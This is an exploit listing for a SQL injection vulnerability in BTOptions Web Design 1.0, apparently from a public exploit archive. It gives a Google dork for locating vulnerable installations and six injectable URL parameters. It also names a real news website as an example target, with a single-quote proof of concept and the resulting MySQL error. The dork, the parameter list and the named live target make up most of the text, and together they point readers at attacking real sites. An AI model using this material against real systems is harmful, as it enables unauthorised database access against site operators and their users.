BTOptions Web Design version 1.0 suffers from a remote SQL injection vulnerability.
a6079ac5b740d2d16c1b0105f97c54ed
##############################################################################
# Exploit Title : BTOptions Web Design 1.0 SQL Injection
# Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security
Army
# Date : 30/12/2018
# Vendor Homepage : btoptions.com
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : Medium
# Version Information : 1.0 - WebServer Apache
# CWE : CWE-89 [ Improper Neutralization of Special Elements used in an SQL
Command ('SQL Injection') ]
# CXSecurity : cxsecurity.com/ascii/WLB-2018060262
##############################################################################
Designed & Developed by Web Based Business Systems BTOptions.Com SQL
Injection Vulnerability
##############################################################################
# Google Dork : intext:''Designed & Developed by Web Based Business
Systems, BT Options.''
# Exploits :
/rataperata_yana_gamana.php?image=[SQL Inj]
/newspack.php?issue=[SQL Inj]
/bnb.php?bnbId=&issue=[SQL Inj]
/hbr.php?issue=[SQL Inj]
/financial_times.php?issue=[SQL Inj]
/article.php?article=[SQL Inj]
##############################################################################
# Example Site :
businesstoday.lk/financial_times.php?issue=323'
=> [ Proof of Concept for SQL Inj ] => archive.is/qKjL4
# SQL Database Error :
You have an error in your SQL syntax; check the manual that corresponds
to your MySQL server version for the right syntax
to use near 'and viewonhome=1 ORDER BY article.adddate DESC' at line 1
##############################################################################
# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
##############################################################################